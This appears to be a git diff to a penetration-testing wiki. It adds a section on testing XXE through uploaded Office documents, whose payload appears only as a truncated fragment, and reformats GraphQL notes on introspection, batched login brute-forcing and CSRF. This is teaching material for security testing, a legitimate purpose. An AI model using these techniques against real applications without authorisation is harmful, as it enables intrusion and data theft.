index eb11b160..24a450ce 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -295,6 +295,47 @@ Testing 0 entities : []
 Testing 0 entities : []
 ```
+### XXE via Office Open XML Parsers
+
+\(Copied from [**here**](https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/)\)
+Many web applications allow you to upload Microsoft Office documents, and then they parse some details out of them. For example, you might have a web application that allows you to import data by uploading a spreadsheet in XLSX format. At some point, in order for the parser to extract the data from the Spreadsheet, the parser is going to need to **parse at least one XML file**.
+
+The only way to test for this is to generate a **Microsoft Office file that contains an XXE payload**, so let’s do that. First, create an empty directory to unzip your document to, and unzip it!
+
+```text
+test$ ls
+test.docx
+test$ mkdir unzipped
+test$ unzip ./test.docx -d ./unzipped/
+Archive: ./test.docx
+ inflating: ./unzipped/word/numbering.xml
+ inflating: ./unzipped/word/settings.xml
+ inflating: ./unzipped/word/fontTable.xml
+ inflating: ./unzipped/word/styles.xml
+ inflating: ./unzipped/word/document.xml
+ inflating: ./unzipped/word/_rels/document.xml.rels
+ inflating: ./unzipped/_rels/.rels
+ inflating: ./unzipped/word/theme/theme1.xml
+ inflating: ./unzipped/[Content_Types].xml
+```
+
+Open up `./unzipped/word/document.xml` in your favourite text editor \(vim\) and edit the **XML to contain your favourite XXE payload**. The first thing I try tends to be a HTTP request, like this:
+
+```text
+ ]>
+&test;
+```
+
+Those lines should be inserted in between the two root XML objects, like this, and of course you will need to replace the URL with a URL that you can monitor for requests:
+
+![Those lines should be inserted in between the two root XML objects, like thi](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-obscure.png)
+
+All that is left is to **zip the file up to create your evil poc.docx file**.
From the “unzipped” directory that we created earlier, run the following:
+
+![From the "unzipped" directory that we created earlier, run the following:](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-unzipped.png)
+
+Now upload the file to your \(hopefully\) vulnerable web application and pray to the hacking gods for a request in your Burp Collaborator logs.
+
 ### Jar: protocol
 The `jar` protocol is only available on **Java applications**. It allows to access files inside a **PKZIP** file \(`.zip`, `.jar`, ...\) and works for local and remote files:
diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md
index becd73ca..6edd3083 100644
--- a/pentesting/pentesting-web/graphql.md
+++ b/pentesting/pentesting-web/graphql.md
@@ -16,7 +16,7 @@ When performing your directory brute force attacks make sure to add the followin
 * _/graphql/console_
 Once you find an open graphQL instance you need to know what queries it supports. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.**
-_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…_graphql.org](https://graphql.org/learn/introspection/)
+\_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…\_graphql.org](https://graphql.org/learn/introspection/)
 ### Basic Enumeration
@@ -74,7 +74,7 @@ Note that the type of the query "_flags_" is "_Flags_", and this object is defin
 ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
-You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
+You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
 ```javascript
 query={flags{name, value}}
@@ -164,7 +164,7 @@ You can also **search several objects at the same time**. In this case, a search
 }r
 ```
-Or even **relations of several different objects using aliases**:
+Or even **relations of several different objects using aliases**:
 ```javascript
 {
@@ -242,7 +242,6 @@ mutation {
 }
 }
 }
-
 ```
 ### Batching brute-force in 1 API request
@@ -254,8 +253,6 @@ Below you can find the simplest demonstration of an application authentication r
 ![](../../.gitbook/assets/image%20%28245%29.png)
-
-
 As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
 ![](../../.gitbook/assets/image%20%28119%29.png)
@@ -268,7 +265,7 @@ If you don't know what CSRF is read the following page:
 Out there you are going to be able to find several GraphQL endpoints **configured without CSRF tokens.**
-Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**.
+Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**.
 ```javascript
 {"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}
@@ -282,7 +279,7 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A
 Therefore, as CSRF requests like the previous ones are sent **without preflight requests**, it's possible to **perform** **changes** in the GraphQL abusing a CSRF.
-However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests.
+However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests.
 Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.**
@@ -294,23 +291,23 @@ For more information **check the** [**original post here**](https://blog.doyense
 ### Clients
-{% embed url="https://github.com/graphql/graphiql" %}
+{% embed url="https://github.com/graphql/graphiql" caption="" %}
-{% embed url="https://github.com/swisskyrepo/GraphQLmap" %}
+{% embed url="https://github.com/swisskyrepo/GraphQLmap" caption="" %}
-{% embed url="https://altair.sirmuel.design/" %}
+{% embed url="https://altair.sirmuel.design/" caption="" %}
-{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" %}
+{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" caption="" %}
-{% embed url="https://github.com/doyensec/inql" %}
+{% embed url="https://github.com/doyensec/inql" caption="" %}
-{% embed url="https://altair.sirmuel.design/" %}
+{% embed url="https://altair.sirmuel.design/" caption="" %}
-{% embed url="https://gitlab.com/dee-see/graphql-path-enum" %}
+{% embed url="https://gitlab.com/dee-see/graphql-path-enum" caption="" %}
 ### Automatic Tests
-{% embed url="https://graphql-dashboard.herokuapp.com/" %}
+{% embed url="https://graphql-dashboard.herokuapp.com/" caption="" %}
 * Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md
index eba183b1..1b96a850 100644
--- a/windows/active-directory-methodology/README.md
+++ b/windows/active-directory-methodology/README.md
@@ -402,7 +402,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
 * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
 * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
-![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2812%29.png)
+![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2813%29.png)
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md
index c278353a..410f873f 100644
--- a/windows/checklist-windows-privilege-escalation.md
+++ b/windows/checklist-windows-privilege-escalation.md
@@ -126,7 +126,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*